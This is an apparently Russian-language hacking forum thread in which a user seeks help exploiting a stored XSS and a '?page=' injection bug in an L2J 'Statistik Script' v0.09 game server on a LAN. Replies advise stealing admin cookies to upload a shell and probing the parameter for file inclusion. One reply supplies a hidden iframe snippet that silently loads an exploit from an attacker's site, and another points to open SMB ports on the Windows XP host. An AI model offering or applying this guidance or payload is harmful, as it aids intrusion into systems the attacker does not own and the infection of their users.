Люди ... подскажите, вот нашел я активную XSS на L2J 'Statistik Script' v0.09, как мне ее заюзать, а лучше где можно почитать побольше инфы про активные XSS ... (есть сплоит для этого движка вроде, но как его впарить - хз) ...
ЖЖоте ...Как я понял, с помощью XSS можно спереть только куки, так? С их помощью нельзя например залить шел на сервак? + в это движке есть уязвимость http://***.**.**/?page=index.php? -->все тормозить начинает и страницу бажит ... Что я могу с ее помощью сделать? (если вы конечно понимаете про что я =) ...
Если это куки админа какого нибудь нормального сайта (в данном случае имеется в виду админа не сайта стоящего на беспл. хостинге, т.к. там чаще всего запрещён пхп) то шелл залить можно спокойно через админку. Если идёт такой запрос, вместо index.php подставь test.php , или любое другое название, главное что бы файл отсутствовал на сервере. И посмотри на результат.
1) вот именно что сайт (скрипт) находится в LAN, и там я админку не нашел, хоть есть форма регистрации и авторизации, это стандартный игровой сервер ''Линейки'' 2) пробывал разные и test.php и др., но бажит только при значении ?page=index.php? ... Видел даже сплоит для этого движка, но как им пользоваться -- хз ... и в описании есть только типо используеться баг при помоще именно ?page=index.php? (этой страницы наверное не существует, хотя ..) PS .. Использовать пассивную XSS не могу, т.к. там нету даже типо "почты" ...
Дык кто что может посоветовать по этому поводу, движок L2J 'Statistik Script' v0.09, сервер XPюша SP2, есть вот этот "баг" с параментром ?page= и страницей к нему index.php? ... Как я понял это php-inj =) ...
ктоме активной хсс можно также если у тебя есть сплоит вписть такой код Code: <iframe src='САЙТ ГДЕ ЛЕЖЫТ ТВОЙ СПЛОИТ' width='1' height='1' style='visibility: hidden;'></iframe> Но все нормальные сплоиты стоят деньги..
это че за нах? 0.о -=kas@t1k=- Говоришь есть сплойт - используй его. Есть xss - используй ее. Есть подозрение на локальный инкулуд - попытайся использовать. Все статьи о том что и как есть на этом форуме - что тебе от нас то надо?
ground_zero, открыты папки: index/ /test/ /icons/ /main/ /main/css/ /ss/ /acm/ /cc/ /forum/ , из них заблокированные (форум, пишет типо на разработке)
понятно ... ты xspiderom сканил наверное ? я это к тому какие порты открыты ? если 137-39 445 проблем вообще не должно возникнуть ... или же подожди пока установят форум и используй свои xss но я думаю поскольку форточка работает под сервер минимум один из дисков имеет доступ из сети и из этова надо плясать ... полазь по папкам которые тебе дают смотреть там может быть много интереснова . вот статейка на досуге http://www.fssr.ru/hz.php?name=News&file=article&sid=1023
Abra>>это че за нах? 0.о Учи хтмл.) Обясняє ето ИФРЕЙМ загружен окно так чтоб эго небыло видно, а сайт куда он сылается там лежыт сплоит, а вот что такое сплоит ищи сам.)))))
